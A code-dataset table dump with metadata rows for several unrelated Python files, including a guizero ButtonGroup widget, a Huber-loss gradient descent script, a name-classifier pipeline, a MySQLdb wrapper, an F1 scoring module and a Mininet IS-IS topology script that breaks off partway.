blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ef27d001cfe1f15f1746179b07b5ffc8218bcbae | e3de9d0fe973060071470f4703e4edf8defc4b87 | /venv/lib/python3.8/site-packages/guizero/ButtonGroup.py | 57adb4fc0d2e4e6cff66d3d09e0f9b5b4b4c23e2 | [] | no_license | nhannguyengithub/emoji_game.py | 62ed14efb76118b77a11be6077e0554907cfc431 | f78a77a8283591ea3b1f230a19d19c5e7ea62bf1 | refs/heads/master | 2023-06-30T07:23:54.803480 | 2021-07-27T22:38:04 | 2021-07-27T22:38:04 | 390,146,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,388 | py | from tkinter import Frame, StringVar
from . import utilities as utils
from .base import ContainerTextWidget
from .tkmixins import TextMixin
from .RadioButton import RadioButton
from .event import EventManager
class ButtonGroup(ContainerTextWidget):
    """A widget grouping RadioButtons so that exactly one option is selected.

    All buttons share a single Tk StringVar (``self._selected``) which holds
    the *value* string of the currently selected option.
    """

    def __init__(
            self,
            master,
            options=[],
            selected=None,
            horizontal=False,
            command=None,
            grid=None,
            align=None,
            args=None,
            visible=True,
            enabled=None,
            width=None,
            height=None):
        """
        Creates a ButtonGroup

        :param Container master:
            The Container (App, Box, etc) the ButtonGroup will belong too.

        :param List option:
            A list of options to append to the ButtonGroup. If a 2D list is
            specified, the first element is the text, the second is the value,
            defaults to an empty list.

        :param string selected:
            The item in the ButtonGroup to select, defaults to `None`.

        :param string horizontal:
            If the ButtonGroup is to be displayed horizontally, defaults to
            `True`.

        :param Callable command:
            The callback function to call when the ButtonGroup changes,
            defaults to `None`.

        :param List grid:
            Grid co-ordinates for the widget, required if the master layout
            is 'grid', defaults to `None`.

        :param string align:
            How to align the widget within the grid, defaults to None.

        :param callback args:
            A list of arguments to pass to the widgets `command`, defaults to
            `None`.

        :param bool visible:
            If the widget should be visible, defaults to `True`.

        :param bool enabled:
            If the widget should be enabled, defaults to `None`. If `None`
            the value is inherited from the master.

        :param int width:
            The starting width of the widget. Defaults to `None` and will auto
            size.

        :param int height:
            The starting height of the widget. Defaults to `None` and will auto
            size.
        """
        # NOTE(review): the mutable default `options=[]` is harmless here
        # because the list is only iterated, never mutated.
        self._rbuttons = []   # List of RadioButton objects
        self._text_size = None
        self._font = None
        self._horizontal = horizontal

        # Create a Tk frame object to contain the RadioButton objects
        tk = Frame(master.tk)

        # Set (using StringVar set() method) the selected option **number**
        self._selected = StringVar(master=tk.winfo_toplevel())

        # ButtonGroup uses "grid" internally to sort the RadioButtons
        super(ButtonGroup, self).__init__(master, tk, "grid", grid, align, visible, enabled, width, height)

        # Loop through the list given and setup the options
        self._options = []
        for option in options:
            self._options.append(self._parse_option(option))

        self._refresh_options()

        # set the initial value
        if selected is None and len(self._options) > 0:
            self.value = self._options[0][1]
        else:
            self.value = selected

        # Add a command if there was one
        self.update_command(command, args)

        # override the event manager and associate the button group and the
        # radio buttons to it
        option_tks = [option.tk for option in self._rbuttons]
        self._events = EventManager(self, self.tk, *option_tks)

        # now the ButtonGroup is populate it, size it
        self.resize(width, height)

    def _parse_option(self, option):
        # Normalize a single option into a [text, value] pair.
        # If only a 1D was provided, use the text value as a key
        if not isinstance(option, list):
            return [option, option]
        else:
            return [option[0], option[1]]

    def _refresh_options(self):
        # Rebuild every RadioButton widget from self._options.
        # destroy any existing radio buttons
        for button in self._rbuttons:
            button.destroy()

        self._rbuttons = []
        gridx = 0
        gridy = 0

        for button in self._options:
            # Which way the buttons go (one axis is advanced per button)
            if self._horizontal:
                gridx += 1
            else:
                gridy += 1

            # Create a radio button object
            rbutton = RadioButton(
                self,
                text=str(button[0]),
                value=str(button[1]),
                variable=self._selected,
                grid=[gridx, gridy],
                align="left",
                visible=self.visible,
                enabled=self.enabled)

            # Add this radio button to the internal list
            self._rbuttons.append(rbutton)
            # Set the callback
            rbutton.tk.config(command=self._command_callback)

    # PROPERTIES
    # -----------------------------------
    # Gets the selected value (1, 2, 3 etc.)
    @property
    def value(self):
        """
        Sets or returns the option selected in a ButtonGroup.
        """
        return (self._selected.get())

    # Sets which option is selected (if it doesn't exist, nothing is selected)
    @value.setter
    def value(self, value):
        self._selected.set(str(value))

    # Gets the text of the currently selected option
    @property
    def value_text(self):
        """
        Sets or returns the option selected in a ButtonGroup by its text value.
        """
        search = self._selected.get()  # a string containing the selected option
        # This is a bit nasty - suggestions welcome
        for item in self._rbuttons:
            if item.value == search:
                return item.text
        return ""

    # Selects the option for the value_text provided
    @value_text.setter
    def value_text(self, value):
        # NOTE(review): no break after a match; if several options share the
        # same text, the value of the *last* matching option wins.
        for item in self._rbuttons:
            if item.text == value:
                self.value = item.value

    def resize(self, width, height):
        """
        Resizes the widget.

        :param int width:
            The width of the widget.

        :param int height:
            The height of the widget.
        """
        self._width = width
        self._height = height

        # update radio buttons width
        for item in self._rbuttons:
            item.width = width

        # update radio buttons height
        if len(self._rbuttons) > 0:
            # work out the height of a button
            button_height = height

            if isinstance(height, int):
                if height % len(self._rbuttons) != 0:
                    # if the height doesnt divide by the number of radio buttons give a warning
                    button_height = int(round(height / len(self._rbuttons)))
                    new_height = button_height * len(self._rbuttons)
                    utils.error_format("ButtonGroup height '{}' doesn't divide by the number of buttons '{}' setting height to '{}'.".format(height, len(self._rbuttons), new_height))
                else:
                    button_height = int(height / len(self._rbuttons))

            for item in self._rbuttons:
                item.height = button_height

        super(ButtonGroup, self).resize(width, height)

    @property
    def options(self):
        """
        Returns a list of options in the ButtonGroup
        """
        return self._options

    @property
    def description(self):
        """
        Returns the description for the widget.
        """
        return "[ButtonGroup] object with selected option '{}'".format(self.value)

    # METHODS
    # -----------------------------------

    def append(self, option):
        """
        Appends a new `option` to the end of the ButtonGroup.

        :param string/List option:
            The option to append to the ButtonGroup. If a 2D list is specified,
            the first element is the text, the second is the value.
        """
        self._options.append(self._parse_option(option))
        self._refresh_options()
        self.resize(self._width, self._height)

    def insert(self, index, option):
        """
        Insert a new `option` in the ButtonGroup at `index`.

        :param int option:
            The index of where to insert the option.

        :param string/List option:
            The option to append to the ButtonGroup. If a 2D list is specified,
            the first element is the text, the second is the value.
        """
        self._options.insert(index, self._parse_option(option))
        self._refresh_options()
        self.resize(self._width, self._height)

    def remove(self, option):
        """
        Removes the first `option` from the ButtonGroup.

        Returns `True` if an item was removed.

        :param string option:
            The value of the option to remove from the ButtonGroup.
        """
        # NOTE(review): unlike append()/insert(), remove() does not call
        # resize() after refreshing -- confirm whether this is intentional.
        for existing_option in self._options:
            if existing_option[1] == option:
                self._options.remove(existing_option)
                self._refresh_options()
                return True
        return False

    def clear(self):
        """
        Clears all the options in a Combo
        """
        self._options = []
        self._refresh_options()
        self.value = ""

    # To help with debugging - return list of text/value pairs
    def get_group_as_list(self):
        return [[option.text, option.value] for option in self._rbuttons]

    def update_command(self, command, args=None):
        """
        Updates the callback command which is called when the ButtonGroup
        changes.

        Setting to `None` stops the callback.

        :param Callable command:
            The callback function to call.

        :param callback args:
            A list of arguments to pass to the widgets `command`, defaults to
            `None`.
        """
        if command is None:
            # no-op callback keeps _command_callback unconditional
            self._command = lambda: None
        else:
            if args is None:
                self._command = command
            else:
                self._command = utils.with_args(command, *args)

    def _command_callback(self):
        # Invoked by every RadioButton's Tk command; forwards to the
        # currently-registered user callback.
        self._command()
| [
"ntnhan.hk@gmail.com"
] | ntnhan.hk@gmail.com |
5bd653bae84debbeefe7b946c6c94548d75f2cd1 | 8d03c3d4768ba866210b21aba3d8177984bfde3a | /Applications/OneDrive/文档/UT/2019 Winter/CSC411/HW3/q1.py | 829a5f30769a6fffd369cbf54c53b6deeed16e3e | [] | no_license | JimmyWen511/b58FinalProject | 3fa313d9f5c3547bc25fe67a0da870efef04dad5 | 900f4ab63ca37e723661045b3a8a830bd888b85d | refs/heads/master | 2021-01-18T16:47:36.298721 | 2019-02-08T15:52:21 | 2019-02-08T15:52:21 | 86,769,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | import numpy as np
def gradient_descent(X, y, lr, num_iter, delta):
    """Fit a linear model (w, b) by gradient descent on the Huber loss.

    :param X: design matrix of shape (N, D).
    :param y: targets of shape (N, 1).
    :param lr: learning rate.
    :param num_iter: number of gradient-descent iterations.
    :param delta: Huber threshold between quadratic and linear regimes.
    :return: tuple (w, b) -- weights of shape (D, 1) and the scalar bias.
    """
    # Use the matrix shape directly: the original len(X[1]) indexed the
    # second row and raised IndexError whenever X had fewer than 2 rows.
    w = np.zeros((X.shape[1], 1))
    b = 10
    for _ in range(num_iter):
        residual = np.dot(X, w) + b - y
        # Huber gradient: identity inside [-delta, delta], clipped outside.
        dloss = np.where(np.abs(residual) <= delta,
                         residual, delta * np.sign(residual))
        # NOTE(review): dw sums over samples while db averages; kept as-is
        # to preserve the original update rule -- confirm intended scaling.
        dw = np.dot(np.transpose(X), dloss)
        db = np.mean(dloss)
        w = w - lr * dw
        b = b - lr * db
    return w, b
# Smoke test: with all-zero features and targets, the weight gradient is
# always zero, so only the bias term moves during descent.
N = 10
D = 5
X = np.zeros((N, D))
y = np.zeros((N, 1))
delta = 1.
lr = 1
dw, db = gradient_descent(X, y, lr, 1000, delta)
print(dw)
print(db)
| [
"wenming.lu@mail.utoronto.ca"
] | wenming.lu@mail.utoronto.ca |
7c6973701596621ef379cf527d1b3b1047184f0a | dc06008809d6257d024d0673107ef69a2c6151cb | /accounts/views.py | d27341fafaa08734a453072ffc9694b9edf75b59 | [] | no_license | K3vwe/BLog-Application | 1526b71322167302f4e9a2cee45c0a4c70847143 | 12a31b60f9da3e2615871d57a00322db67efbc24 | refs/heads/main | 2022-12-24T12:43:05.495484 | 2020-10-05T20:32:38 | 2020-10-05T20:32:38 | 301,538,116 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | from django.shortcuts import render
from django.contrib.auth.forms import UserCreationForm
from django.urls import reverse_lazy
from django.views import generic
# Create your views here.
class SignUpView(generic.CreateView):
form_class = UserCreationForm
success_url = reverse_lazy('login')
template_name = 'signup.html' | [
"rukkimax@gmail.com"
] | rukkimax@gmail.com |
32d5dcf040bbe38413b58e6d2302d1d574012652 | d518dc5a84a018b0c704886d7b0e1a63e71d65c1 | /nytimes/settings.py.template.py | bd7dd1ca165d6b3807ca024d673c7355a57d5be6 | [
"Apache-2.0"
] | permissive | ljvillanueva/data_download | 1b0ac84bef43483a548ded86c832feab7d4c219a | 073878bf849700d928d8c3a044a3a6d1e982336e | refs/heads/master | 2022-12-10T08:43:25.071371 | 2020-09-05T17:30:57 | 2020-09-05T17:30:57 | 258,795,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12 | py | nytpath = "" | [
"villanueval@si.edu"
] | villanueval@si.edu |
788e90f3a30b4c82f945b157818a5ac3cd85e728 | c09b440f329c12fcaefe3484317eaec1b7d8f137 | /src/main.py | d68b4fc7a833d3822670a793ec5f0e2c07b89660 | [] | no_license | kyosek/name-classifier | a96f5c54fc32800c3e76816a965a4919d51c4160 | 56343f8a4bf637e78a5282598087403b8a1eb5cf | refs/heads/master | 2023-03-18T08:59:28.296446 | 2021-03-19T23:36:30 | 2021-03-19T23:36:30 | 349,576,068 | 0 | 0 | null | 2021-03-19T23:36:31 | 2021-03-19T23:02:26 | Jupyter Notebook | UTF-8 | Python | false | false | 2,527 | py | import argparse
import logging
import pickle
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from modules.transform.preprocess import cleanNames
from modules.train.train import trainNaiveBayes, saveModel
logging.basicConfig(
format="%(asctime)s --- %(levelname)s --- %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.INFO,
)
logger = logging.getLogger(__name__)
def main(train_required=True):
    """Run the end-to-end name-classification pipeline.

    Args:
        train_required (bool or str, optional):
            If True (or the string "True"), train a new Naive Bayes model
            and save it.
            If False (or the string "False"), load the trained model
            from "resources/models/nb_model.pkl".
            Any other value logs an error and exits.
            Defaults to True.

    Process:
        1. Load the data
        2. Preprocess the text
        3. Split the data into train and test
        4. Load the trained model, or train and save a new one
        5. Make predictions on the test set
        6. Evaluate the model and log its accuracy
    """
    logging.info("Loading data")
    df = pd.read_csv("resources/data/data.csv")

    logging.info("Preprocess the names")
    df['cleaned_name'] = df['Name'].apply(cleanNames)

    logging.info("Splitting the dataset")
    X_train, X_test, y_train, y_test = train_test_split(
        df["cleaned_name"], df["Class"], test_size=.3, random_state=42)

    # argparse hands us the strings "True"/"False", while direct callers
    # (and the default) may pass a real bool.  Normalise so both work --
    # previously main() with the default bool True fell through to the
    # error branch and exited.
    if isinstance(train_required, bool):
        train_required = str(train_required)

    if train_required == "False":
        logging.info("Loading the model")
        # 'with' closes the file handle (the original open() leaked it)
        with open("resources/models/nb_model.pkl", "rb") as model_file:
            clf = pickle.load(model_file)
    elif train_required == "True":
        logging.info("Start training the model")
        clf = trainNaiveBayes(X_train, y_train)
        saveModel(clf)
    else:
        logging.info("Please enter the argument 'train_required' either True or False")
        exit()

    logging.info("Making predictions")
    predictions = clf.predict(X_test)

    logging.info("Evaluating the model performance")
    logging.info("Accuracy on the test set is " +
                 str(round(accuracy_score(y_test, predictions), 4)))
    logging.info("Process completed successfully")
if __name__ == "__main__":
    # CLI entry point: a single positional string ("True"/"False") decides
    # whether the model is trained or loaded from disk.
    parser = argparse.ArgumentParser("Name classification")
    # fixed typo in the help text ("wether" -> "whether")
    parser.add_argument("train_required", type=str,
                        help="whether to train the model ('True') or load it ('False')")
    args = parser.parse_args()
    main(args.train_required)
| [
"kyosuke1029@icloud.com"
] | kyosuke1029@icloud.com |
cea9ae785ef6a31a24ff306dd44bd8cb277f1816 | f082f9e3553578ba57e47311994c75f067143abc | /Unit_digit_value.py | dc5d46c677b275a992dff4ff459bac3cb375e05c | [] | no_license | Mbonea-Mjema/random-python-scripts- | 1c9ec17e5145e6d3c2adab5ef0509e10874f5198 | 1f116a729b77e0846321c7be8455f53cfd8df77d | refs/heads/master | 2020-03-11T07:17:13.400683 | 2018-05-06T22:27:23 | 2018-05-06T22:27:23 | 129,853,079 | 0 | 0 | null | 2020-02-04T20:40:37 | 2018-04-17T05:53:02 | Python | UTF-8 | Python | false | false | 481 | py | '''
unit place values
By mbonea mjema
'''
# Map each digit 0-9 to the cycle of unit digits of its successive powers.
Numbers = {}

# pretty-printer for the final mapping
import pprint
pp = pprint.PrettyPrinter(indent=4)

for num in range(10):
    # (exponent, unit digit) pairs until the first repeated unit digit
    cycle = []
    seen = []
    for exponent in range(1, 10):
        unit_digit = (num ** exponent) % 10
        if unit_digit in seen:
            break
        seen.append(unit_digit)
        cycle.append((exponent, unit_digit))
    Numbers[num] = cycle
pp.pprint(Numbers)
| [
"mjema86@gmail.com"
] | mjema86@gmail.com |
fd5a05d0ceb01e4ed7cbca40b447b506540c68c1 | bcf99042596397b1b58dc9e175855802dcfb8a1c | /HomePage/MySQLUtil.py | fc9543169daed04392dfbe9bd2142cf64dc8e618 | [] | no_license | sdgdsffdsfff/WorkJean | 3775500383121e92b191f29e79540cf85460ee5b | ed9b887c351b4dc155e14c068e2331b7802e3af4 | refs/heads/master | 2020-12-25T09:37:34.725698 | 2015-01-05T07:16:23 | 2015-01-05T07:16:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,211 | py | # -*- coding:utf-8 -*-
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""A lightweight wrapper around MySQLdb."""
import copy
import itertools
import logging
import time
import MySQLdb.constants
import MySQLdb.converters
import MySQLdb.cursors
class Connection(object):
    """A lightweight wrapper around MySQLdb DB-API connections.

    The main value we provide is wrapping rows in a dict/object so that
    columns can be accessed by name. Typical usage::

        db = database.Connection("localhost", "mydatabase")
        for article in db.query("SELECT * FROM articles"):
            print article.title

    Cursors are hidden by the implementation, but other than that, the methods
    are very similar to the DB-API.

    We explicitly set the timezone to UTC and the character encoding to
    UTF-8 on all connections to avoid time zone and encoding errors.
    """
    def __init__(self, host, database, user=None, password=None, port=None,
                 max_idle_time=7 * 3600):
        self.host = host
        self.database = database
        self.max_idle_time = max_idle_time

        args = dict(conv=CONVERSIONS, use_unicode=True, charset="utf8",
                    db=database)
        if user is not None:
            args["user"] = user
        if password is not None:
            args["passwd"] = password
        if port is not None:
            args["port"] = port

        # We accept a path to a MySQL socket file or a host(:port) string
        if "/" in host:
            args["unix_socket"] = host
        else:
            self.socket = None
            pair = host.split(":")
            if len(pair) == 2:
                args["host"] = pair[0]
                args["port"] = int(pair[1])
            else:
                args["host"] = host
                # args["port"] = 3306

        self._db = None
        self._db_args = args
        self._last_use_time = time.time()
        try:
            self.reconnect()
        except Exception:
            logging.error("Cannot connect to MySQL on %s", self.host,
                          exc_info=True)

    def __del__(self):
        self.close()

    def close(self):
        """Closes this database connection."""
        if getattr(self, "_db", None) is not None:
            self._db.close()
            self._db = None

    def reconnect(self):
        """Closes the existing database connection and re-opens it."""
        self.close()
        # Prefer a DBUtils connection pool when the package is available;
        # fall back to a plain MySQLdb connection otherwise.  Both paths
        # enable autocommit.
        try:
            from DBUtils import PooledDB
            pool_con = PooledDB.PooledDB(creator=MySQLdb, mincached=1,
                                         maxcached=10, maxshared=10,
                                         maxconnections=20, blocking=False,
                                         maxusage=100, **self._db_args)
            self._db = pool_con.connection()
            self._db.cursor().connection.autocommit(True)
        except:
            self._db = MySQLdb.connect(**self._db_args)
            self._db.autocommit(True)

    def iter(self, query, *parameters):
        """Returns an iterator for the given query and parameters."""
        self._ensure_connected()
        # SSCursor streams rows from the server instead of buffering them
        cursor = MySQLdb.cursors.SSCursor(self._db)
        try:
            self._execute(cursor, query, parameters)
            column_names = [d[0] for d in cursor.description]
            for row in cursor:
                yield Row(zip(column_names, row))
        finally:
            cursor.close()

    def query(self, query, *parameters):
        """Returns a row list for the given query and parameters."""
        cursor = self._cursor()
        try:
            self._execute(cursor, query, parameters)
            column_names = [d[0] for d in cursor.description]
            # itertools.izip: this module targets Python 2
            return [Row(itertools.izip(column_names, row)) for row in cursor]
        finally:
            cursor.close()

    def get(self, query, *parameters):
        """Returns the first row returned for the given query."""
        rows = self.query(query, *parameters)
        if not rows:
            return None
        elif len(rows) > 1:
            raise Exception("Multiple rows returned for Database.get() query")
        else:
            return rows[0]

    # rowcount is a more reasonable default return value than lastrowid,
    # but for historical compatibility execute() must return lastrowid.
    def execute(self, query, *parameters):
        """Executes the given query, returning the lastrowid from the query."""
        return self.execute_lastrowid(query, *parameters)

    def execute_lastrowid(self, query, *parameters):
        """Executes the given query, returning the lastrowid from the query."""
        cursor = self._cursor()
        try:
            self._execute(cursor, query, parameters)
            return cursor.lastrowid
        finally:
            cursor.close()

    def execute_rowcount(self, query, *parameters):
        """Executes the given query, returning the rowcount from the query."""
        cursor = self._cursor()
        try:
            self._execute(cursor, query, parameters)
            return cursor.rowcount
        finally:
            cursor.close()

    def executemany(self, query, parameters):
        """Executes the given query against all the given param sequences.

        We return the lastrowid from the query.
        """
        return self.executemany_lastrowid(query, parameters)

    def executemany_lastrowid(self, query, parameters):
        """Executes the given query against all the given param sequences.

        We return the lastrowid from the query.
        """
        cursor = self._cursor()
        try:
            cursor.executemany(query, parameters)
            return cursor.lastrowid
        finally:
            cursor.close()

    def executemany_rowcount(self, query, parameters):
        """Executes the given query against all the given param sequences.

        We return the rowcount from the query.
        """
        cursor = self._cursor()
        try:
            cursor.executemany(query, parameters)
            return cursor.rowcount
        finally:
            cursor.close()

    def _ensure_connected(self):
        # Mysql by default closes client connections that are idle for
        # 8 hours, but the client library does not report this fact until
        # you try to perform a query and it fails. Protect against this
        # case by preemptively closing and reopening the connection
        # if it has been idle for too long (7 hours by default).
        if (self._db is None or
                (time.time() - self._last_use_time > self.max_idle_time)):
            self.reconnect()
        self._last_use_time = time.time()

    def _cursor(self):
        self._ensure_connected()
        return self._db.cursor()

    def _execute(self, cursor, query, parameters):
        """Run *query* on *cursor*, reconnecting on OperationalError.

        BUGFIX: the cursor is deliberately NOT closed here.  The previous
        ``finally: cursor.close()`` closed the cursor before the callers
        (query/get/iter/execute_*) read ``cursor.description``, iterated
        the rows or read ``lastrowid``/``rowcount`` -- every caller still
        needs the cursor after this returns, and each one already closes
        it in its own ``finally`` block.
        """
        try:
            return cursor.execute(query, parameters)
        except OperationalError:
            logging.error("Error connecting to MySQL on %s", self.host)
            self.close()
            raise
class Row(dict):
    """A dict whose keys are also readable as attributes (row.column)."""

    def __getattr__(self, name):
        # Only called when normal attribute lookup fails, so dict methods
        # and real attributes always win over column names.
        if name in self:
            return self[name]
        raise AttributeError(name)
# Fix the access conversions to properly recognize unicode/binary
FIELD_TYPE = MySQLdb.constants.FIELD_TYPE
FLAG = MySQLdb.constants.FLAG
CONVERSIONS = copy.copy(MySQLdb.converters.conversions)

# String-like column types whose converter must check the BINARY flag
field_types = [FIELD_TYPE.BLOB, FIELD_TYPE.STRING, FIELD_TYPE.VAR_STRING]
if 'VARCHAR' in vars(FIELD_TYPE):
    # VARCHAR is only present in newer MySQLdb releases
    field_types.append(FIELD_TYPE.VARCHAR)

for field_type in field_types:
    # Prepend a (BINARY flag -> str) rule so binary columns stay raw bytes
    # while non-binary ones fall through to the default unicode converter.
    CONVERSIONS[field_type] = [(FLAG.BINARY, str)] + CONVERSIONS[field_type]

# Alias some common MySQL exceptions
IntegrityError = MySQLdb.IntegrityError
OperationalError = MySQLdb.OperationalError
| [
"shen_jl@Ctrip.com"
] | shen_jl@Ctrip.com |
ba54ef7ffb1baac0a542ab9205ad64cd67fc1ec1 | 49bb27ea1ed99dbc9a68aad82e5be186e08c0207 | /f1ftw/calculate_progression.py | a16527c02ed53b5b12a8dc356b297da20fcc1306 | [] | no_license | JamesScanlan/f1ftw | e96b3cb1a063316a5681df97a18ad9d6a5e85552 | 5969b34fbbade05f4eda18bb27d21ed1435c5961 | refs/heads/master | 2023-08-09T17:55:27.484932 | 2023-07-31T22:35:15 | 2023-07-31T22:35:15 | 110,609,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,344 | py | import objects
def calculate_progression_score(race_team, race_results, drivers_championship):
    """Sum the positions gained (grid minus finish) by *race_team*'s drivers,
    each weighted by that driver's ranking in the championship."""
    total = 0
    for result in race_results:
        if result.driver.team != race_team:
            continue
        weight = drivers_championship.get_ranking(result.driver)
        total += (result.grid - result.position) * weight
    return total
def calculate_progression_scores(predictions, results, drivers_championship):
    """Build the PROGRESSION-stage results: one scored entry per predictor."""
    entries = []
    for prediction in predictions:
        points = calculate_progression_score(
            prediction.progression_prediction,
            results.race_results,
            drivers_championship)
        entry = objects.calculation_score_results.CalculationScoreResult(
            prediction.predictor, points)
        entry.log = ("For " + str(prediction.predictor) +
                     " team progression score for " +
                     str(prediction.progression_prediction) +
                     " = " + str(points) + " points")
        entries.append(entry)
    calculated_scores = objects.calculation_score_results.CalculationScoreResults(
        objects.grand_prix_stages.GrandPrixStages.PROGRESSION)
    calculated_scores.results = entries
    return calculated_scores
| [
"djamesscanlan@gmail.com"
] | djamesscanlan@gmail.com |
481dc9bb944ff3f959e0bcc63adc027ad0de60b1 | 54bf4a3a1820e62cd9c86978167eb71324c174d7 | /nets-in-progress/ditella-8r-1c-srv6-pm/isis8d.py.backup | b30fe257f0373427c075a53c8dd18c9114b31bf3 | [
"Apache-2.0"
] | permissive | huangoldman/rose-srv6-tutorial | 7ef90379031e73c376d6172425477b83310fc313 | 30a7ed46ba0efa050ca6d76a5a608d9b7b7aadad | refs/heads/master | 2023-08-18T23:14:23.907140 | 2021-10-05T18:18:59 | 2021-10-05T18:18:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,531 | backup | #!/usr/bin/python
# pylint: disable=missing-module-docstring
# pylint: disable=missing-function-docstring
# pylint: disable=missing-class-docstring
import os
import shutil
import sys
from argparse import ArgumentParser
import python_hosts
from dotenv import load_dotenv
from mininet.cli import CLI
# from mininet.link import Link
from mininet.log import setLogLevel
from mininet.net import Mininet
# from mininet.topo import Topo
from mininet.node import Host, OVSBridge
from mininet.util import dumpNodeConnections
from time import sleep
# BASEDIR = "/home/user/mytests/ospf3routers/nodeconf/"
# Per-node configuration tree: nodeconf/<name>/start.sh, daemon configs, logs
BASEDIR = os.getcwd() + "/nodeconf/"
# File where the host -> PID mapping of all emulated nodes is dumped
OUTPUT_PID_TABLE_FILE = "/tmp/pid_table_file.txt"
# Private (per-node) directory mounted inside every Mininet namespace
PRIVDIR = '/var/priv'

# Path of the file containing the entries (ip-hostname)
# to be added to /etc/hosts
ETC_HOSTS_FILE = './etc-hosts'

# Define whether to add Mininet nodes to /etc/hosts file or not
ADD_ETC_HOSTS = True

# Define whether to start the node managers on the routers or not
START_NODE_MANAGERS = False

# Load environment variables from .env file
load_dotenv()

# Get node manager path
NODE_MANAGER_PATH = os.getenv('NODE_MANAGER_PATH', None)
if NODE_MANAGER_PATH is not None:
    NODE_MANAGER_PATH = os.path.join(NODE_MANAGER_PATH,
                                     'srv6_manager.py')
# Get gRPC server port
NODE_MANAGER_GRPC_PORT = os.getenv('NODE_MANAGER_GRPC_PORT', None)

# Castagnacci-Ditella Progetto
# Global variables: names of the SRv6-PM sender/reflector chosen by the user
choosed_sender = ''
choosed_reflector = ''
# -----------------------------
class BaseNode(Host):
    """A Mininet Host with a private /var/priv mount and per-node boot script.

    Each node gets a scratch directory under /tmp/<name> and, if present,
    sources nodeconf/<name>/start.sh during configuration.
    """

    def __init__(self, name, *args, **kwargs):
        dirs = [PRIVDIR]
        Host.__init__(self, name, privateDirs=dirs, *args, **kwargs)
        self.dir = "/tmp/%s" % name
        self.nets = []
        if not os.path.exists(self.dir):
            os.makedirs(self.dir)

    def config(self, **kwargs):
        # pylint: disable=arguments-differ
        # Init steps
        Host.config(self, **kwargs)
        # Iterate over the interfaces
        # first = True
        for intf in self.intfs.values():
            # Remove any configured address
            self.cmd('ifconfig %s 0' % intf.name)
            # # For the first one, let's configure the mgmt address
            # if first:
            #     first = False
            #     self.cmd('ip a a %s dev %s' %(kwargs['mgmtip'], intf.name))
        # let's write the hostname in /var/mininet/hostname
        self.cmd("echo '" + self.name + "' > " + PRIVDIR + "/hostname")
        # Run the per-node boot script, if one was provided
        if os.path.isfile(BASEDIR + self.name + "/start.sh"):
            self.cmd('source %s' % BASEDIR + self.name + "/start.sh")

    def cleanup(self):
        # Helper: remove a file only if it exists (daemon pid/log/socket files)
        def remove_if_exists(filename):
            if os.path.exists(filename):
                os.remove(filename)

        Host.cleanup(self)
        # Rm dir
        if os.path.exists(self.dir):
            shutil.rmtree(self.dir)

        # Remove the zebra/isisd artifacts left in the node's config dir
        remove_if_exists(BASEDIR + self.name + "/zebra.pid")
        remove_if_exists(BASEDIR + self.name + "/zebra.log")
        remove_if_exists(BASEDIR + self.name + "/zebra.sock")
        remove_if_exists(BASEDIR + self.name + "/isis8d.pid")
        remove_if_exists(BASEDIR + self.name + "/isis8d.log")
        remove_if_exists(BASEDIR + self.name + "/isisd.log")
        remove_if_exists(BASEDIR + self.name + "/isisd.pid")
        remove_if_exists(OUTPUT_PID_TABLE_FILE)

        # if os.path.exists(BASEDIR+self.name+"/zebra.pid"):
        #     os.remove(BASEDIR+self.name+"/zebra.pid")
        # if os.path.exists(BASEDIR+self.name+"/zebra.log"):
        #     os.remove(BASEDIR+self.name+"/zebra.log")
        # if os.path.exists(BASEDIR+self.name+"/zebra.sock"):
        #     os.remove(BASEDIR+self.name+"/zebra.sock")
        # if os.path.exists(BASEDIR+self.name+"/ospfd.pid"):
        #     os.remove(BASEDIR+self.name+"/ospfd.pid")
        # if os.path.exists(BASEDIR+self.name+"/ospfd.log"):
        #     os.remove(BASEDIR+self.name+"/ospfd.log")
        # if os.path.exists(OUTPUT_PID_TABLE_FILE):
        #     os.remove(OUTPUT_PID_TABLE_FILE)
class Router(BaseNode):
    """A BaseNode that can additionally launch the SRv6 node manager."""

    def __init__(self, name, *args, **kwargs):
        BaseNode.__init__(self, name, *args, **kwargs)

    def config(self, **kwargs):
        # pylint: disable=arguments-differ
        # Perform the common BaseNode configuration first
        BaseNode.config(self, **kwargs)
        # Optionally launch the gRPC node manager in the background
        if not START_NODE_MANAGERS:
            return
        self.cmd('python %s --grpc-port %s &'
                 % (NODE_MANAGER_PATH, NODE_MANAGER_GRPC_PORT))
class Switch(OVSBridge):
    """An OVSBridge with the same scratch-dir/boot-script handling as BaseNode.

    Used for the out-of-band management network connecting the controller
    to every router.
    """

    def __init__(self, name, *args, **kwargs):
